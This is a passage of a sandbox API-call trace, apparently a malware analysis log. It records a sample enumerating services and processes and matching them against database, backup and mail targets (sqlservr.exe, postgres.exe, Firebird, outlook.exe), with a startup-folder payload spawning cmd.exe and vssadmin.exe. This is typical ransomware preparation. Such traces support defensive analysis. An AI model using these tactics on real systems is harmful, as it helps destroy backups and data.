(lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.485] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.485] lstrlenW (lpString="UxSms") returned 5 [0053.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.485] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.485] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.485] lstrlenW (lpString="VSS") returned 3 [0053.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.485] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.485] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.485] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.486] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.486] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.486] lstrlenW (lpString="Winmgmt") returned 7 [0053.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.486] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.486] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0053.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0053.488] Process32FirstW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.489] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.489] lstrlenW (lpString="System") returned 6 [0053.489] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.489] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.489] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.490] lstrlenW (lpString="smss.exe") returned 8 [0053.490] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.490] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.490] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.495] lstrlenW (lpString="csrss.exe") returned 9 [0053.495] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.495] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.495] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.495] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.495] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.495] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.495] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.495] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.496] lstrlenW (lpString="wininit.exe") returned 11 [0053.496] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.496] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.496] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.496] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.496] lstrlenW (lpString="csrss.exe") returned 9 [0053.496] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.497] lstrlenW (lpString="winlogon.exe") returned 12 [0053.497] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.498] lstrlenW (lpString="services.exe") returned 12 [0053.498] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.498] lstrlenW (lpString="lsass.exe") returned 9 [0053.498] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.499] lstrlenW (lpString="lsm.exe") returned 7 [0053.499] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.499] lstrlenW (lpString="svchost.exe") returned 11 [0053.499] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.500] lstrlenW (lpString="svchost.exe") returned 11 [0053.500] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.501] lstrlenW (lpString="svchost.exe") returned 11 [0053.501] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.501] lstrlenW (lpString="svchost.exe") returned 11 [0053.501] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.502] lstrlenW (lpString="svchost.exe") returned 11 [0053.502] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.502] lstrlenW (lpString="audiodg.exe") returned 11 [0053.502] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.503] lstrlenW (lpString="svchost.exe") returned 11 [0053.503] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.504] lstrlenW (lpString="svchost.exe") returned 11 [0053.504] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.504] lstrlenW (lpString="dwm.exe") returned 7 [0053.504] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.505] lstrlenW (lpString="explorer.exe") returned 12 [0053.505] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.506] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.506] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.506] lstrlenW (lpString="taskhost.exe") returned 12 [0053.506] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.507] lstrlenW (lpString="svchost.exe") returned 11 [0053.507] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.507] lstrlenW (lpString="taskeng.exe") returned 11 [0053.507] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.508] lstrlenW (lpString="taskhost.exe") returned 12 [0053.508] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0053.509] lstrlenW (lpString="challenging.exe") returned 15 [0053.509] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0053.509] lstrlenW (lpString="pgp prix.exe") returned 12 [0053.509] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0053.510] lstrlenW (lpString="user-reno.exe") returned 13 [0053.510] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0053.510] lstrlenW (lpString="aggregate.exe") returned 13 [0053.510] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0053.511] lstrlenW (lpString="dressed.exe") returned 11 [0053.511] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0053.512] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0053.512] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0053.512] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0053.512] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0053.513] lstrlenW (lpString="developing.exe") returned 14 [0053.513] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0053.514] lstrlenW (lpString="supported.exe") returned 13 [0053.514] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0053.514] lstrlenW (lpString="girlstionselect.exe") returned 19 [0053.514] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0053.515] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0053.515] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0053.515] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0053.515] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0053.518] lstrlenW (lpString="eating.exe") returned 10 [0053.518] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0053.518] lstrlenW (lpString="nh_protected.exe") returned 16 [0053.518] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0053.519] lstrlenW (lpString="vulnerability.exe") returned 17 [0053.519] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0053.519] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0053.519] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0053.520] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0053.520] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0053.521] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0053.521] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0053.521] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0053.521] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.522] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.522] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0053.522] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0053.523] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.523] lstrlenW (lpString="cmd.exe") returned 7 [0053.523] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.524] lstrlenW (lpString="conhost.exe") returned 11 [0053.524] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0053.524] lstrlenW (lpString="vssadmin.exe") returned 12 [0053.524] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0053.525] lstrlenW (lpString="VSSVC.exe") returned 9 [0053.525] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.526] lstrlenW (lpString="svchost.exe") returned 11 [0053.526] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.526] CloseHandle (hObject=0x164) returned 1 [0053.526] Sleep (dwMilliseconds=0x1f4) [0054.123] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3940708 [0054.123] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0054.123] GetLastError () returned 0xea [0054.123] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0054.123] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0054.124] CloseServiceHandle (hSCObject=0x3940708) returned 1 [0054.124] lstrlenW (lpString="Appinfo") returned 7 [0054.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.124] lstrlenW (lpString="AudioEndpointBuilder") returned 20 